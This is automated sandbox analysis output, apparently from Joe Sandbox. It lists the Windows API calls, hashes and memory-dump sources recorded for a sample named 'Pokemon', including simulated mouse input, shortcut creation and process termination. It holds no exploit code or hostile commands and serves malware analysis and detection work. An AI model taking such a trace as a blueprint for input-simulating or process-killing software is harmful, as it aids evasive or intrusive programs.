• LeaveCriticalSection.KERNEL32(?), ref: 00101283
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0010129A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 001012C8
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: 29d9cff3ac7d621d822edfd9b9f6cf512e1b34f8f80505b3221a64769ef5c085
• Instruction ID: fcc57696b5bc6343bdce5c798515a47a582bd322d0dca283e7fb92ad042455dd
• Opcode Fuzzy Hash: 29d9cff3ac7d621d822edfd9b9f6cf512e1b34f8f80505b3221a64769ef5c085
• Instruction Fuzzy Hash: 18416D71900204FFDF04DF58DC85AAAB7B8FF04310F1484A5ED00AA296D774DEA1DBA4
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,000EFBEF,00000000,?,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 00128CA7
• EnableWindow.USER32(?,00000000), ref: 00128CCD
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00128D2C
• ShowWindow.USER32(?,00000004), ref: 00128D40
• EnableWindow.USER32(?,00000001), ref: 00128D66
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00128D8A
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 02fdec7d8aaf305827434991c38544ba48900ccc2d0feb6cdb7ba7bfe676c632
• Instruction ID: a8522037eeeedd32bb3828025df6aeb0775c413c0cf46c100fffebb327aec146
• Opcode Fuzzy Hash: 02fdec7d8aaf305827434991c38544ba48900ccc2d0feb6cdb7ba7bfe676c632
• Instruction Fuzzy Hash: 6641B730603664AFEB35DF24F889BE17BF1FB45308F184065E5085B6A2CB7168B6CB50
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 00112D45
  • Part of subcall function 0010EF33: GetWindowRect.USER32(?,?), ref: 0010EF4B
• GetDesktopWindow.USER32 ref: 00112D6F
• GetWindowRect.USER32(00000000), ref: 00112D76
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00112DB2
• GetCursorPos.USER32(?), ref: 00112DDE
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00112E3C
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0b18ed35bcd55d8547c7563ff7c71bce476e3902a10c87ee7c42dfce445c35da
                                                                                                                                                                                                                                                                                      • Instruction ID: 2766d5183f7e4de1a5dca2c49306d3f648f7b9150423eb28656b0d91fd760e6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b18ed35bcd55d8547c7563ff7c71bce476e3902a10c87ee7c42dfce445c35da
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91312272505316AFCB24DF54E845FABB7A9FF84314F000929F48897181CB70E9A9CBD2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 000F55F9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000F5616
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000F564E
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F566C
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000F5674
                                                                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 000F567E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cba5242f36da5c8ae08fce4ddcadf9463948990e83123d35cbacf26f3126b699
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d79929e83299245b6f0c8aff00def3c6c8ffef1b792c3d2f3308d039811bd63
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cba5242f36da5c8ae08fce4ddcadf9463948990e83123d35cbacf26f3126b699
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E02126722046087BEB255B28EC49EBF7BE8DF44711F148039FA05DB492EE74CD41A660
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001062C0
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 001063DA
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00130CC4,00000000,00000001,00130B34,?), ref: 001063F3
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00106411
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                      • Opcode ID: a4bafdd9a0d004100495594f861a1bff2c6b6e40f034ed013d1f957e4337e10c
                                                                                                                                                                                                                                                                                      • Instruction ID: 816540a18a85fc6e4630409a25ca3d4c2a6c3e0d69c6c44c05cef87d138da227
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4bafdd9a0d004100495594f861a1bff2c6b6e40f034ed013d1f957e4337e10c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96D14275A043019FCB14DF24C494A6ABBE5FF89714F14885CF8899B3A2CB72EC45CB92
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00128740
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00128765
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0012877D
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 001287A6
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0010C1F2,00000000), ref: 001287C6
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 001287B1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000B36E9,000B3355), ref: 000B3700
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000B370E
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000B3727
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,000B36E9,000B3355), ref: 000B3779
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000B4D53,00000000,?,?,000B68E2,?,?,00000000), ref: 000C30EB
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C311E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3146
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 000C3153
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 000C315F
                                                                                                                                                                                                                                                                                      • _abort.LIBCMT ref: 000C3165
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00091F87
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091F96
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: BeginPath.GDI32(?), ref: 00091FAD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091FD6
                                                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001294AA
                                                                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 001294BE
                                                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001294CC
                                                                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 001294DC
                                                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 001294EC
                                                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 001294FC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 000F5B7C
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 000F5B8D
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F5B94
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 000F5B9C
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000F5BB3
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 000F5BC5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 876683169d1a9fb0ceca8d37449a3006a09ede9db325f8c5dadb001ed8b67a31
                                                                                                                                                                                                                                                                                      • Instruction ID: da0ff4c9799792565996ccca646ed3dc5967a3b5eb8b694deda4f063d369df93
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 876683169d1a9fb0ceca8d37449a3006a09ede9db325f8c5dadb001ed8b67a31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC018F75A00308BBEB109BA5AC49E5EBFB8EB48752F004065FB09A7681D6709C11CBA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000932AF
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 000932B7
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000932C2
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000932CD
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 000932D5
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000932DD
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 53ea7226fa5e0139d773bc18c0f1749787a70701deaacd6aa3ef01aefdd6f748
                                                                                                                                                                                                                                                                                      • Instruction ID: 602c89266009778c4dffafe269f0b08590cecb58033bd5d29411f24e937c4e46
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53ea7226fa5e0139d773bc18c0f1749787a70701deaacd6aa3ef01aefdd6f748
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000FF447
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000FF45D
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 000FF46C
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FF47B
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FF485
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FF48C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0107ac5feb52e6207a3672408eb6e69381dd934a737b4378a5072f9f2fa56a9b
                                                                                                                                                                                                                                                                                      • Instruction ID: 52eb8422cc64abb6d5bf1903342f120aed2be91df10ebd8b47644834e7f2dd55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0107ac5feb52e6207a3672408eb6e69381dd934a737b4378a5072f9f2fa56a9b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F03A72241158BFE7315B62EC0EEEF3B7CEFC6B11F000058FA0191490D7A46AA2D6B5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 000D34EF
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 000D3506
                                                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 000D3512
                                                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 000D3521
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 000D3533
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 000D354D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 47fe5a372c4720eefd8868fc0d15011383da4b1be3154e4fda2ba3383bcac522
                                                                                                                                                                                                                                                                                      • Instruction ID: 2266e971dd4de25ea19e1d74e0e39cb6f301bbb83c122f1a6501d6b04a729b3a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47fe5a372c4720eefd8868fc0d15011383da4b1be3154e4fda2ba3383bcac522
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC014631500605FFDB605FA4EC08BEA7BB1FB08321F500161FA1AA26A0CB711EA2AB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000F21CC
                                                                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 000F21D8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000F21E1
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000F21E9
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000F21F2
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F21F9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1dd519b1644e616703c3762cf075080ff3f57220eccf43b834e013e3e6d7cc3e
                                                                                                                                                                                                                                                                                      • Instruction ID: afcae5782c1426d8f954c957c7b9924e27213579b1e7defe0daf08cdecacf3dd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd519b1644e616703c3762cf075080ff3f57220eccf43b834e013e3e6d7cc3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EE0E5B6004105BFDB115FA1FC0D90ABF39FF49322B104220F22582870CB3294B2DB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000FCF99
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FCFE0
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000FD047
                                                                                                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000FD075
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
